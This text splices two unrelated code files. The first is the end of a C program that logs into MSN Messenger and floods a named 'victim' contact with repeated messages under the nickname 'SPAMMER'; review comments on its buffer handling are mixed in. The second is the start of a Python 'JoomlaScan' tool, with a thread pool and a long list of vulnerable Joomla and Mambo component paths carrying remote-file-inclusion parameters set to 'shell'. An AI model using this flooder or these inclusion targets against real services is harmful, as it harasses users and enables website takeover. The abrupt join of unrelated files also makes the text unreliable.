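    strcpy (id, ptr);                   /* fits, terminator included */

    return 0;
}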
#
#
/* get host and page from NEXUS data in 'data'; page will save in 'page', IP server will save in host ! */
#
#
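/*
 * Extract host and page from the "DALogin=<host>/<page>," field of a
 * NEXUS reply.
 *
 * buff   reply text; modified in place (separators become NULs)
 * host   out: host name
 * page   out: page path, without the leading '/'
 * sizes  combined room for both outputs; each one gets sizes / 2 bytes
 *
 * Returns 0. Missing fields and over-long values are reported through
 * _error().
 *
 * Change from the original: values that do not fit are rejected. The
 * original used strncpy(), which leaves the destination unterminated
 * when the source fills it and otherwise truncates silently, so a long
 * value in the server's reply could make later code read past the
 * buffer or contact a different host than the one named.
 */
int nexus_redirect (char* buff, char* host, char* page, unsigned short sizes)
{
    char *ptr, *set;
    unsigned short size = sizes / 2;

    if ((ptr = strstr (buff, "DALogin=")) == NULL || (set = strchr (ptr, '=')) == NULL)
        _error ("Cannot get DALogin field.");

    ptr = ++set;                        /* skip 'DALogin=' */

    if ((set = strchr (ptr, '/')) == NULL)
        _error ("Cannot get hostname from NEXUS received data.");

    *set = 0;

    if (strlen (ptr) >= size)
        _error ("Hostname from NEXUS received data too long.");

    strcpy (host, ptr);                 /* save host */

    ptr = set + 1;

    if ((set = strchr (ptr, ',')) == NULL)
        _error ("Cannot get page from NEXUS received data.");

    *set = 0;

    if (strlen (ptr) >= size)
        _error ("Page from NEXUS received data too long.");

    strcpy (page, ptr);

    fprintf (stdout, "New Host and Page obtained from NEXUS server.\n Server: %s\n Page: %s\n", host, page);

    return 0;
}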
#
#
/* get ticket from ssl server reply and save it in 'ticket' */
#
#
/*
 * Pull the quoted value out of the "Authentication-Info:" header of
 * `reply` and store it in `ticket`, followed by "\r\n".
 *
 * reply        reply text; the closing quote is overwritten with a NUL
 * ticket       out: the quoted value plus "\r\n"
 * ticket_size  size passed to snprintf() for `ticket`
 *
 * Returns 0. A missing header or quote and an over-long value are
 * reported through _error().
 *
 * NOTE(review): the length check does not reserve room for the "\r\n"
 * and the terminator, so snprintf() can silently drop the line ending
 * for values close to `ticket_size`.
 */
int save_ticket (char* reply, char* ticket, unsigned short ticket_size)
{
    char *header, *quote, *value;

    header = strstr (reply, "Authentication-Info:");
    if (header == NULL || (quote = strchr (header, '\'')) == NULL)
        _error ("Cannot get passport ticket.");

    value = quote + 1;                  /* first byte after the opening quote */

    quote = strchr (value, '\'');
    if (quote == NULL)
        _error ("Unexpected error !");
    else
        *quote = 0;                     /* end the value at the closing quote */

    if (strlen (value) > ticket_size)
        _error ("Ticket too long !?");

    snprintf (ticket, ticket_size, "%s\r\n", value);

    fprintf (stdout, "OK, ticket received and saved.\n");

    return 0;
}
#
#
/* authentication with TWINER */
#
#
/*
 * Send "<req> <ticket>" on `sd`, read the reply into `buff` and require
 * it to start with `assertion`; afterwards drain the socket with
 * clean_sock().
 *
 * sd         connected socket
 * req        command prefix
 * ticket     ticket text appended after one space
 * buff       receive buffer, NUL-terminated on return
 * size       capacity of `buff`
 * assertion  expected prefix of the reply
 *
 * Returns 0. Allocation, send and receive failures and a reply that does
 * not match are reported through _error().
 */
int usr_receive (int sd, char* req, char* ticket, char* buff, unsigned short size, char* assertion)
{
    char *line;
    int needed, count;

    memset (buff, 0, size);

    /* both strings, the separating space and the terminator */
    needed = strlen (req) + strlen (ticket) + 2;

    line = (char*) malloc (needed * sizeof (char));
    if (line == NULL)
        _error ("Cannot allocate memory for TWINER authentication send data.");

    sprintf (line, "%s %s", req, ticket);

    count = send (sd, line, strlen (line), 0);
    if (count < 0)
        _error ("Cannot send data !?");

    count = recv (sd, buff, size - 1, 0);
    if (count < 0)
        _error ("Cannot receive data !?");

    buff[count] = 0;

    if (strncmp (buff, assertion, strlen (assertion)) != 0)
        _error ("Login failed.");

    fprintf (stdout, "Login successfull.\n");

    free (line);
    line = NULL;

    clean_sock (sd);

    return 0;
}
#
#
/* syncronize with server and receive contacts list...We will ignore all... */
#
#
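/*
 * Send `request` on `sd` and discard everything the server answers,
 * until the socket has been silent for three seconds.
 *
 * Returns 0. A failed send prints "Failed." and exits with -1; a failed
 * select() is reported through _error().
 *
 * Changes from the original:
 *   - the loop also ends when recv() returns 0 or an error. The original
 *     ignored the result, so a closed connection (always readable, always
 *     returning 0) kept it spinning forever;
 *   - the descriptor set is rebuilt on every pass and the read length is
 *     taken from the buffer instead of a repeated literal.
 */
int syn_receive (int sd, char* request)
{
    int rval;
    char buff[2048];
    fd_set read_set;
    struct timeval timeout;

    printf ("Syncronizing with server...");
    fflush (stdout);

    if (send (sd, request, strlen (request), 0) < 0)
    {
        printf ("Failed.\n");
        _exit (-1);
    }

    for (;;)
    {
        FD_ZERO (&read_set);
        FD_SET (sd, &read_set);
        timeout.tv_sec = 3;
        timeout.tv_usec = 0;

        rval = select (sd + 1, &read_set, NULL, NULL, &timeout);

        if (rval < 0)
            _error ("select() call failed.");
        else if (rval == 0)
            break;                      /* quiet for the whole timeout */
        else if (recv (sd, buff, sizeof buff, 0) <= 0)
            break;                      /* peer closed or read error */
    }

    printf ("OK.\n");

    return 0;
}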
#
#
/* prepare to flood */
#
#
/*
 * Ask the server on `sd` for a second ("SB") server, connect to it,
 * authenticate there and invite the contact named by `victim`.
 *
 * sd           connected socket to the current server
 * req          request text sent on `sd`
 * new_server   out: host taken from the reply
 * server_size  byte count passed to strncpy() for `new_server`
 * port         out: port taken from the reply
 * id           out: text following "CKI " in the reply, up to and
 *              including the end of that line
 * account      account name used in the USR command
 * victim       contact name used in the CAL command
 *
 * Returns the socket descriptor of the new connection. Every failure is
 * reported through _error().
 *
 * NOTE(review): all parsing here runs on data received from the network.
 * strncpy() does not terminate `new_server` when the host fills
 * `server_size` bytes, atoi() accepts any text as a port, and `id` is
 * only checked against the local 2048-byte size, not against the
 * capacity of the caller's buffer, which is not visible here.
 */
int init_msg (int sd, char* req, char* new_server, unsigned short server_size, unsigned short* port,
              char* id, char* account, char* victim)
{
    int size = 2048;
    int sd_sb, got, type, length;
    char buff[size], request[size];
    char *cur, *mark, *server;

    clean_sock (sd);

    if (send (sd, req, strlen (req), 0) < 0)
        _error ("Cannot send request to start flood :-(");

    fprintf (stdout, "\nInitialize flood...\n");

    got = recv (sd, buff, sizeof buff - 1, 0);
    if (got < 0)
        _error ("Cannot receive data.");

    buff[got] = 0;

    /* host: between "XFR 9 SB " and the first ':' after it */
    cur = strstr (buff, "XFR 9 SB ");
    if (cur == NULL || (mark = strchr (cur, ':')) == NULL)
        _error ("Cannot read new server.");

    cur += strlen ("XFR 9 SB ");
    *mark = 0;
    strncpy (new_server, cur, server_size);

    /* port: between that ':' and the next space */
    cur = mark + 1;
    mark = strchr (cur, ' ');
    if (mark == NULL)
        _error ("Cannot read new port.");

    *mark = 0;
    *port = atoi (cur);

    /* id: from after "CKI " through the end of that line */
    cur = mark + 1;
    mark = strstr (cur, "CKI ");
    if (mark == NULL)
        _error ("Cannot get id from XFR SB.");

    cur = mark + strlen ("CKI ");
    mark = strchr (cur, '\n');
    if (mark == NULL)
        _error ("Cannot get id from XFR SB.");

    mark[1] = 0;                        /* terminate right after "\r\n" */

    if (strlen (cur) > size)
        _error ("Data from XFR SB too long !?");

    strcpy (id, cur);

    server = resolve (&type, &length, new_server);
    sd_sb = msn_connect (server, *port, type, length);

    snprintf (request, size, "USR 8 %s %s", account, id);
    msn_request (sd_sb, type, server, request, buff, size);

    if (strncmp (buff, "USR 8 OK", 8) != 0)
        _error ("Unexpected error. Try again please !");

    fprintf (stdout, "Calling %s...", victim);
    fflush (stdout);

    snprintf (request, size, "CAL 10 %s\r\n", victim);
    msn_request (sd_sb, type, server, request, buff, size);

    if (strncmp (buff, "CAL 10 RINGING", 13) != 0)
    {
        /* the receive buffer is reused to build the error text */
        if (strncmp (buff, "217", 3) == 0)
        {
            snprintf (buff, sizeof buff - 1, "Failed.\nContacts \"%s\" don't exist in your contacts list or is offline/hide.\n", victim);
            _error (buff);
        }
        else
        {
            snprintf (buff, sizeof buff - 1, "Failed.\nContacts \"%s\" is invalid !?.\n", victim);
            _error (buff);
        }
    }

    puts ("OK.");

    msn_request (sd_sb, type, server, NULL, buff, size); /* receive only */

    if (strncmp (buff, "JOI", 3) != 0)
        _error ("JOI command not received !?");

    return sd_sb;                       /* socket descriptor of the new connection */
}
#
#
/*
 * Build one MSG command and send it repeatedly on `sd_sb` from a forked
 * child process.
 *
 * sd_sb  connected socket the messages are written to
 * force  0: the child sends the message 1500 times and the parent waits
 *           for it;
 *        non-zero: the child keeps sending until it is signalled, and the
 *           parent sends it SIGINT once a newline is read from stdin.
 *
 * Returns 0 in the parent; the child leaves through _exit(). fork(),
 * send() and kill() failures are reported through _error().
 *
 * The message body is the fixed MIME header below followed by a block of
 * "\r\n" pairs of about 1000 bytes, so every message on the wire is
 * identical; repeated identical MSG payloads on one connection are what
 * a receiving side or a monitor would see.
 */
int send_msg (int sd_sb, unsigned short force)
#
{
#
static const char header[] = "MIME-Version: 1.0\r\n"
#
"Content-Type: text/plain; charset=UTF-8\r\n"
#
"X-MMS-IM-Format: FN=Arial; EF=I; CO=0; CS=0; PF=22\r\n"
#
"\r\n";
#
#
char tmp[1003];
#
char msg[1500];
#
char *set;
#
unsigned cnt, len;
#
pid_t pid;
#
#
memset (msg, 0, sizeof msg);
#
#
fprintf (stdout, "\nFlooding%s...", (!force) ? "" : ", press Enter for stop");
#
fflush (stdout);
#
#
cnt = 0;
#
/* 1000: the fill loop below appends two bytes per pass up to this count */
len = sizeof (tmp) - 3;
#
memset (tmp, 0, len);
#
#
while (cnt < len)
#
{
#
strcat (tmp, "\r\n");
#
cnt += 2;
#
}
#
/* cut at the last '\r' and append one more "\r\n" */
set = strrchr (tmp, '\r');
#
if (set) *set = 0;
#
strcat (tmp, "\r\n");
#
/* from here on `len` is the payload length announced in the MSG line */
len = strlen (header) + strlen (tmp);
#
#
/* NOTE(review): `len` is unsigned but printed with %d; unbounded sprintf into msg[1500] */
sprintf (msg, "MSG 11 N %d\r\n"
#
"%s%s", len, header, tmp);
#
#
cnt = 0;
#
pid = fork();
#
#
if (pid < 0)
#
_error ("Unexpected error.");
#
else if (!pid)
#
{
#
/* child: the counter only advances when `force` is 0, so with `force`
   set this loop ends only through a signal or a failed send() */
while (cnt < 1500)
#
{
#
if (send (sd_sb, msg, strlen (msg), 0) < 0)
#
_error ("Cannot send message.");
#
if (!force) /* if 'force' parameter is true flood forever... */
#
cnt++;
#
}
#
_exit (0);
#
}
#
else
#
{
#
if (force)
#
{
#
int c;
#
/* NOTE(review): EOF from getchar() never equals '\n', so a closed stdin
   makes this loop spin without ever stopping the child; the child is
   also not waited for after kill() */
while (1)
#
if ((c = getchar()) == '\n')
#
{
#
fprintf (stdout, "Stopping flood...");
#
fflush (stdout);
#
if (kill (pid, SIGINT) < 0)
#
_error ("Cannot kill child.");
#
else
#
break;
#
}
#
}
#
else
#
/* parent blocks until the child has finished its 1500 sends */
wait (0);
#
}
#
#
puts ("OK");
#
return 0;
#
}
#
#
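/*
 * Handle a redirect reply: take the new host and page from its
 * "Location: " header and repeat the request against that host.
 *
 * server, page  out: host and page taken from the header; per the
 *               original comment each buffer holds 512 bytes
 * buff, size    in: the redirect reply (modified in place);
 *               out: the reply of the new server
 * type, length  out: filled in for the new host by _ssl_request()
 * request       request text, sent to the new host exactly as given
 *
 * Returns 0. A missing header, an over-long field and a reply that does
 * not start with "HTTP/1.1 200 OK" are reported through _error().
 *
 * Change from the original: host and page are rejected when they do not
 * fit in 512 bytes including the terminator. The original used
 * strncpy (..., 512), which leaves the destination unterminated for a
 * long header value, so the fprintf() and the lookup that follow would
 * read past the buffer.
 *
 * NOTE(review): the search for the '/' that ends the host is not limited
 * to the Location line, and `request` is not rebuilt for the new host
 * and page.
 */
int login_redirection ( char* server, char* page, char* buff, unsigned short size,
                        int* type, int* length, char* request)
{
    enum { FIELD_SIZE = 512 };          /* size of server and page */
    char *set, *off;

    fprintf (stdout, "Redirected to another server.\n");

    if ((set = strstr (buff, "Location: ")) == NULL)
        _error ("Cannot get new server.");

    set += strlen ("Location: ");

    if ((off = strchr (set, '/')) == NULL)
        _error ("Cannot get new server.");

    while (*off == '/') off++;          /* skip the slashes after the scheme */
    set = off;

    if ((off = strchr (set, '/')) == NULL)
        _error ("Cannot get new page.");

    *off = 0;
    off++;

    if (strlen (set) >= FIELD_SIZE)
        _error ("Server too big !?");

    strcpy (server, set);

    set = off;
    if ((off = strchr (set, '\r')) != NULL)
        *off = 0;

    if (strlen (set) >= FIELD_SIZE)
        _error ("Page too long !?");

    strcpy (page, set);

    fprintf (stdout, " Server: %s\n Page: %s\n", server, page);

    _ssl_request ( type, length, server, 443, request,
                   buff, size, (char*) NULL, "Unauthorized.");

    if (strncmp (buff, "HTTP/1.1 200 OK", 15))
    {
        puts ("\nPlease report this Error:\n");
        _error (buff);
    }

    return 0;
}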
#
#
/*
 * Program entry point: parse the options, read the credentials, run the
 * login sequence and then hand over to init_msg() and send_msg().
 *
 * Options, as given to getopt(): -a <contact>, -r <nick>, -f, -h.
 *
 * NOTE(review):
 *   - `rnick` is never initialised, yet it is compared with NULL near the
 *     end when -r was not given;
 *   - getopt() returns int but its result is stored in a plain char;
 *   - `pass` and `e_pass` hold the password in clear or lightly encoded
 *     form and are neither wiped nor freed;
 *   - `server` keeps pointing at the result of an earlier resolve() call
 *     while later calls resolve other names.
 */
int main (int argc, char** argv){

    unsigned short buff_size = 4096, port = 0, force_flood = 0;
    int sd, sd_sb, type, length;
    char c;
    char *server = NULL, *e_pass = NULL, *victim = NULL, *rnick;
    char account[200], pass[200];
    char buff[buff_size], id[buff_size], id_sb[buff_size], request[buff_size], ticket[buff_size];
    char nexus_redir[2][512];
    char xfr_server[50], xfr_sb_server[50];

    if (argc < 3 || argc > 6) usage (*argv);

    while ((c = getopt (argc, argv, "a:r:fh")) != -1)
    {
        switch (c)
        {
            case 'a':
                victim = strdup (optarg);
                if (victim == NULL) _error ("Cannot allocate memory.");
                break;

            case 'f':
                force_flood = 1;
                break;

            case 'h':
                usage (*argv);
                break;

            case 'r':
                rnick = strdup (optarg);
                if (rnick == NULL) _error ("Cannot allocate memory.");
                break;

            case '?':
                if (optopt == 'a' || optopt == 'r')
                    fprintf (stderr, "\nOption -%c requires an argument.\n"
                                     "See %s -h\n\n", optopt, *argv);
                else
                    fprintf (stderr, "\nUnknow -%c option.\n"
                                     "See %s -h\n\n", optopt, *argv);
                exit (2);
        }
    }

    if (!victim) usage (*argv);

    get_data (account, pass, 200);
    putchar ('\n');

    /* first server: only used to learn where to go next */
    server = resolve (&type, &length, "messenger.hotmail.com");
    sd = msn_connect (server, 1863, type, length);
    msn_start (sd, type, server, account, buff, buff_size);
    close (sd);
    fprintf (stdout, "Connection close.\n");

    /* second server, taken from the XFR reply */
    xfr_redirect (buff, xfr_server, sizeof (xfr_server) - 1, &port);
    server = resolve (&type, &length, xfr_server);
    sd = msn_connect (server, 1863, type, length);
    msn_start (sd, type, server, account, buff, buff_size);

    save_id (buff, id, buff_size);      /* id required by the nexus authentication */
    e_pass = str_encode (pass);

    fprintf (stdout, "Incoming TWEENER Authentication.\n");

    _ssl_request (&type, &length, "nexus.passport.com", 443,
                  "GET /rdr/pprdr.asp HTTP/1.0\r\n\r\n",
                  buff, buff_size,
                  "HTTP/1.1 200 OK", "Bad NEXUS reply.");

    nexus_redirect (buff, nexus_redir[0], nexus_redir[1], sizeof (nexus_redir) - 1);

    snprintf (request, buff_size,
              "GET /%s HTTP/1.1\r\n"
              "Authorization: Passport1.4 OrgVerb=GET,"
              "OrgURL=http%%3A%%2F%%2Fmessenger%%2Emsn%%2Ecom,"
              "sign-in=%s,pwd=%s,%s"
              "User-Agent: MSMSGS\r\n"
              "Host: %s\r\n"
              "Connection: Keep-Alive\r\n"
              "Cache-Control: no-cache\r\n\r\n",
              nexus_redir[1], account, e_pass, id, nexus_redir[0]);

    _ssl_request ( &type, &length, nexus_redir[0], 443, request,
                   buff, buff_size, (char*) NULL, "Unauthorized.");

    if (strncmp (buff, "HTTP/1.1 200 OK", 15) != 0)
    {
        if (strncmp (buff, "HTTP/1.1 302 Found", 18) == 0) /* redirection... */
            login_redirection ( nexus_redir[0], nexus_redir[1], buff, buff_size,
                                &type, &length, request);
        else
            _error ("\nUnauthorized.\n");
    }

    save_ticket (buff, ticket, sizeof ticket - 1);
    usr_receive (sd, "USR 4 TWN S", ticket, buff, buff_size, "USR 4 OK");
    syn_receive (sd, "SYN 5 0 0\r\n");

    msn_request (sd, type, server, "PRP 6 MFN SPAMMER\r\n", buff, buff_size); /* set new nick name */
    msn_request (sd, type, server, "CHG 7 NLN 0 0\r\n", buff, buff_size); /* set online status */
    msn_request (sd, type, server, "PRP 8 MFN MSN%20SHIT%20SHIT%20SHIT%20!!!\r\n", buff, buff_size); /* set new nick name */

    sd_sb = init_msg (sd, "XFR 9 SB\r\n", xfr_sb_server, sizeof (xfr_sb_server) - 1, &port, id_sb, account, victim);
    send_msg (sd_sb, force_flood);
    close (sd_sb);

    snprintf (request, buff_size, "PRP 12 MFN %s\r\n", (rnick == NULL) ? account : rnick);
    msn_request (sd, type, server, request, buff, buff_size); /* restore nick name */
    msn_request (sd, type, server, "OUT\r\n", buff, buff_size); /* quit */
    close (sd);

    fprintf (stdout, "\n\n Finish ! :-))\n\n");

    return 0;
}
JoomlaScan
#!/usr/bin/env python
import httplib,time,socket
import threading, Queue
class NoResultsPending(Exception):
    """Raised when every submitted work request has already been handled."""
class NoWorkersAvailable(Exception):
    """Raised when requests remain but no worker thread is left to run them."""
class WorkerThread(threading.Thread):
    """Daemon thread that moves work from a request queue to a result queue.

    Each request taken from the request queue is executed and the pair
    (request, return value) is put on the result queue. The thread keeps
    doing this until dismiss() has been called.
    """

    def __init__(self, requestsQueue, resultsQueue, **kwds):
        """Configure the thread as a daemon and start it right away.

        requestsQueue and resultsQueue are the two queues described in the
        class docstring; any extra keyword arguments are handed on to
        threading.Thread.
        """
        threading.Thread.__init__(self, **kwds)
        self.setDaemon(1)
        self.workRequestQueue = requestsQueue
        self.resultQueue = resultsQueue
        self._dismissed = threading.Event()
        self.start()

    def run(self):
        """Execute queued requests one after another until dismissed."""
        while True:
            if self._dismissed.isSet():
                break
            # blocks while the request queue is empty
            job = self.workRequestQueue.get()
            if self._dismissed.isSet():
                # dismissed while waiting: hand the request back untouched
                self.workRequestQueue.put(job)
                break
            # NOTE(review): an exception raised by the callable is not
            # caught here and ends this worker thread
            outcome = job.callable(*job.args, **job.kwds)
            self.resultQueue.put((job, outcome))

    def dismiss(self):
        """Ask the thread to stop once its current request is finished."""
        self._dismissed.set()
class WorkRequest:
    """One call to be made later by a worker thread.

    makeRequests() builds a list of these for the same callable with
    different arguments.
    """

    def __init__(self, callable, args=None, kwds=None, requestID=None,
                 callback=None):
        """Record the callable, its arguments and an optional callback.

        callable   object a worker thread will call
        args       list of positional arguments (defaults to an empty list)
        kwds       dict of keyword arguments (defaults to an empty dict)
        requestID  hashable key under which ThreadPool stores the request;
                   defaults to id(self)
        callback   called as callback(request, result) when the result is
                   picked up from the result queue; extra data for it can
                   be attached to the request object
        """
        self.requestID = id(self) if requestID is None else requestID
        self.callback = callback
        self.callable = callable
        self.args = args or []
        self.kwds = kwds or {}
class ThreadPool:
    """Pool of worker threads fed from one request queue.

    Requests are handed out through putRequest(); their results come back
    on a second queue and are delivered to the request callbacks by poll()
    or wait().
    """

    def __init__(self, num_workers, q_size=0):
        """Create both queues and start num_workers worker threads.

        A q_size above 0 bounds the request queue, so putRequest() blocks
        while the queue is full.
        """
        self.requestsQueue = Queue.Queue(q_size)
        self.resultsQueue = Queue.Queue()
        self.workers = []
        self.workRequests = {}
        self.createWorkers(num_workers)

    def createWorkers(self, num_workers):
        """Start num_workers additional worker threads."""
        for _ in range(num_workers):
            thread = WorkerThread(self.requestsQueue, self.resultsQueue)
            self.workers.append(thread)

    def dismissWorkers(self, num_workers):
        """Ask up to num_workers threads to stop after their current job."""
        count = min(num_workers, len(self.workers))
        for _ in range(count):
            self.workers.pop().dismiss()

    def putRequest(self, request):
        """Queue a work request and remember it until its result arrives."""
        self.requestsQueue.put(request)
        self.workRequests[request.requestID] = request

    def poll(self, block=False):
        """Deliver every result that is available to its callback.

        Raises NoResultsPending when no request is outstanding and, in
        blocking mode, NoWorkersAvailable when no worker is left.
        """
        while 1:
            try:
                if not self.workRequests:
                    # nothing outstanding any more
                    raise NoResultsPending
                elif block and not self.workers:
                    # would wait forever: nobody is left to produce results
                    raise NoWorkersAvailable
                finished, value = self.resultsQueue.get(block=block)
                if finished.callback:
                    finished.callback(finished, value)
                del self.workRequests[finished.requestID]
            except Queue.Empty:
                break

    def wait(self):
        """Block until every outstanding request has been delivered."""
        while 1:
            try:
                self.poll(True)
            except NoResultsPending:
                break
def makeRequests(callable, args_list, callback=None):
    """Build one WorkRequest per entry of args_list for the same callable.

    args_list must offer an items() method (for example a dict); every
    value yielded by items() becomes one request. callback is attached to
    each request and is called when its result is collected.

    NOTE(review): the test below compares the item itself with the boolean
    returned by isinstance(), so it is false for every (key, value) tuple
    a dict yields. In practice each request therefore receives the whole
    tuple as its single positional argument, and the branch that unpacks
    positional and keyword arguments is not taken.
    """
    built = []
    for entry in args_list.items():
        if entry == isinstance(entry, tuple):
            request = WorkRequest(callable, entry[0], entry[1],
                                  callback=callback)
        else:
            request = WorkRequest(callable, [entry], None, callback=callback)
        built.append(request)
    return built
paths = {"components/com_flyspray/startdown.php" : "startdown.php?file=shell",
"administrator/components/com_admin/admin.admin.html.php" : "admin.admin.html.php?mosConfig_absolute_path=shell",
"components/com_simpleboard/file_upload.php" : "file_upload.php?sbp=shell",
"components/com_hashcash/server.php" : "server.php?mosConfig_absolute_path=shell",
"components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php" : "config.inc.php?mosConfig_absolute_path=shell",
"components/com_sitemap/sitemap.xml.php" : "sitemap.xml.php?mosConfig_absolute_path=shell ",
"components/com_performs/performs.php" : "performs.php?mosConfig_absolute_path=shell",
"components/com_forum/download.php" : "download.php?phpbb_root_path=shell",
"components/com_pccookbook/pccookbook.php" : "pccookbook.php?mosConfig_absolute_path=shell",
"components/com_extcalendar/extcalendar.php" : "extcalendar.php?mosConfig_absolute_path=shell",
"components/minibb/index.php" : "index.php?absolute_path=shell",
"components/com_smf/smf.php" : "smf.php?mosConfig_absolute_path=",
"modules/mod_calendar.php" : "mod_calendar.php?absolute_path=shell ",
"components/com_pollxt/conf.pollxt.php" : "conf.pollxt.php?mosConfig_absolute_path=shell ",
"components/com_loudmounth/includes/abbc/abbc.class.php" : "abbc.class.php?mosConfig_absolute_path=shell",
"components/com_videodb/core/videodb.class.xml.php" : "videodb.class.xml.php?mosConfig_absolute_path=shell",
"components/com_pcchess/include.pcchess.php" : "include.pcchess.php?mosConfig_absolute_path=shell",
"administrator/components/com_multibanners/extadminmenus.class.php" : "extadminmenus.class.php?mosConfig_absolute_path=shell",
"administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php" : "admin.a6mambohelpdesk.php?mosConfig_live_site=shell",
"administrator/components/com_colophon/admin.colophon.php" : "admin.colophon.php?mosConfig_absolute_path=shell",
"administrator/components/com_mgm/help.mgm.php" : "help.mgm.php?mosConfig_absolute_path=shell",
"components/com_mambatstaff/mambatstaff.php" : "mambatstaff.php?mosConfig_absolute_path=shell",
"components/com_securityimages/configinsert.php" : "configinsert.php?mosConfig_absolute_path=shell",
"components/com_securityimages/lang.php" : "lang.php?mosConfig_absolute_path=shell",
"components/com_artlinks/artlinks.dispnew.php" : "artlinks.dispnew.php?mosConfig_absolute_path=shell",
"components/com_galleria/galleria.html.php" : "galleria.html.php?mosConfig_absolute_path=shell",
"akocomments.php" : "akocomments.php?mosConfig_absolute_path=shell",
"administrator/components/com_cropimage/admin.cropcanvas.php" : "admin.cropcanvas.php?cropimagedir=shell",
"administrator/components/com_kochsuite/config.kochsuite.php" : "config.kochsuite.php?mosConfig_absolute_path=shell",
"administrator/components/com_comprofiler/plugin.class.php" : "plugin.class.php?mosConfig_absolute_path=shell",
"components/com_zoom/classes/fs_unix.php" : "fs_unix.php?mosConfig_absolute_path=shell",
"components/com_zoom/includes/database.php" : "database.php?mosConfig_absolute_path=shell",
"administrator/components/com_serverstat/install.serverstat.php" : "install.serverstat.php?mosConfig_absolute_path=shell",
"components/com_fm/fm.install.php" : "fm.install.php?lm_absolute_path=shell",
"administrator/components/com_mambelfish/mambelfish.class.php" : "mambelfish.class.php?mosConfig_absolute_path=shell",
"components/com_lmo/lmo.php" : "lmo.php?mosConfig_absolute_path=shell",
"administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php" : "toolbar.linkdirectory.html.php?mosConfig_absolute_ path=shell",
"components/com_mtree/Savant2/Savant2_Plugin_textarea.php" : "Savant2_Plugin_textarea.php?mosConfig_absolute_path=shell",
"administrator/components/com_jim/install.jim.php" : "install.jim.php?mosConfig_absolute_path=shell",
"administrator/components/com_webring/admin.webring.docs.php" : "admin.webring.docs.php?component_dir=shell",
"administrator/components/com_remository/admin.remository.php" : "admin.remository.php?mosConfig_absolute_path=shell",
"administrator/components/com_babackup/classes/Tar.php" : "Tar.php?mosConfig_absolute_path=shell",
"administrator/components/com_lurm_constructor/admin.lurm_constructor.php" : "admin.lurm_constructor.php?lm_absolute_path=shell",
"components/com_mambowiki/MamboLogin.php" : "MamboLogin.php?IP=shell",
"administrator/components/com_a6mambocredits/admin.a6mambocredits.php" : "admin.a6mambocredits.php?mosConfig_live_site=shell",
"administrator/components/com_phpshop/toolbar.phpshop.html.php" : "toolbar.phpshop.html.php?mosConfig_absolute_path=shell",
"components/com_cpg/cpg.php" : "cpg.php?mosConfig_absolute_path=shell",
"components/com_moodle/moodle.php" : "moodle.php?mosConfig_absolute_path=shell ",
"components/com_extended_registration/registration_detailed.inc.php" : "registration_detailed.inc.php?mosConfig_absolute_path=shell",
"components/com_mospray/scripts/admin.php" : "admin.php?basedir=shell",
"administrator/components/com_bayesiannaivefilter/lang.php" : "lang.php?mosConfig_absolute_path=shell",
"administrator/components/com_uhp/uhp_config.php" : "uhp_config.php?mosConfig_absolute_path=shell",
"administrator/components/com_peoplebook/param.peoplebook.php" : "param.peoplebook.php?mosConfig_absolute_path=shell",
"administrator/components/com_mmp/help.mmp.php" : "help.mmp.php?mosConfig_absolute_path=shell",
"components/com_reporter/processor/reporter.sql.php" : "reporter.sql.php?mosConfig_absolute_path=shell",
"components/com_madeira/img.php" : "img.php?url=shell",
"components/com_jd-wiki/lib/tpl/default/main.php" : "main.php?mosConfig_absolute_path=shell",
"components/com_bsq_sitestats/external/rssfeed.php" : "rssfeed.php?baseDir=shell",
"com_bsq_sitestats/external/rssfeed.php" : "rssfeed.php?baseDir=shell",
"components/com_slideshow/admin.slideshow1.php" : "admin.slideshow1.php?mosConfig_live_site=shell",
"administrator/components/com_panoramic/admin.panoramic.php" : "admin.panoramic.php?mosConfig_live_site=shell",
"administrator/components/com_mosmedia/includes/credits.html.php" : "credits.html.php?mosConfig_absolute_path=shell",
"administrator/components/com_mosmedia/includes/info.html.php" : "info.html.php?mosConfig_absolute_path=shell",
"administrator/components/com_mosmedia/includes/media.divs.php" : "media.divs.php?mosConfig_absolute_path=shell",
"administrator/components/com_mosmedia/includes/media.divs.js.php" : "media.divs.js.php?mosConfig_absolute_path=shell",
"administrator/components/com_mosmedia/includes/purchase.html.php" : "purchase.html.php?mosConfig_absolute_path=shell",
"administrator/components/com_mosmedia/includes/support.html.php" : "support.html.php?mosConfig_absolute_path=shell",
"administrator/components/com_wmtportfolio/admin.wmtportfolio.php" : "admin.wmtportfolio.php?mosConfig_absolute_path=shell",
"components/com_mp3_allopass/allopass.php" : "components/com_mp3_allopass/allopass.php?mosConfig_live_site=shell",
"components/com_mp3_allopass/allopass-error.php" : "components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=shell",
"administrator/components/com_jcs/jcs.function.php" : "administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=shell",
"administrator/components/com_jcs/view/add.php" : "administrator/components/com_jcs/view/add.php?mosConfig_absolute_path=shell",
"administrator/components/com_jcs/view/history.php" : "administrator/components/com_jcs/view/history.php?mosConfig_absolute_path=shell",
"administrator/components/com_jcs/view/register.php" : "administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=shell",
"administrator/components/com_jcs/views/list.sub.html.php" : "administrator/components/com_jcs/views/list.sub.html.php?mosConfig_absolute_path=shell",
"administrator/components/com_jcs/views/list.user.sub.html.php" : "administrator/components/com_jcs/views/list.user.sub.html.php?mosConfig_absolute_path=shell",
"administrator/components/com_jcs/views/reports.html.php" : "administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=shell",
"com_joomla_flash_uploader/install.joomla_flash_uploader.php" : "com_joomla_flash_uploader/install.joomla_flash_uploader.php?mosConfig_absolute_path=shell",
"com_joomla_flash_uploader/uninstall.joomla_flash_uploader.php" : "com_joomla_flash_uploader/uninstall.joomla_flash_uploader.php?mosConfig_absolute_path=shell",
"administrator/components/com_jjgallery/admin.jjgallery.php" : "administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=shell",
"administrator/components/com_juser/xajax_functions.php" : "administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=shell",
"components/com_jreviews/scripts/xajax.inc.php" : "components/com_jreviews/scripts/xajax.inc.php?mosConfig_absolute_path=shell",
"com_directory/modules/mod_pxt_latest.php" : "com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=shell",
"administrator/components/com_joomla_flash_uploader/install.joomla_flash_uploader.php" : "administrator/components/com_joomla_flash_uploader/install.joomla_flash_uploader.php?mosConfig_absolute_path=shell",
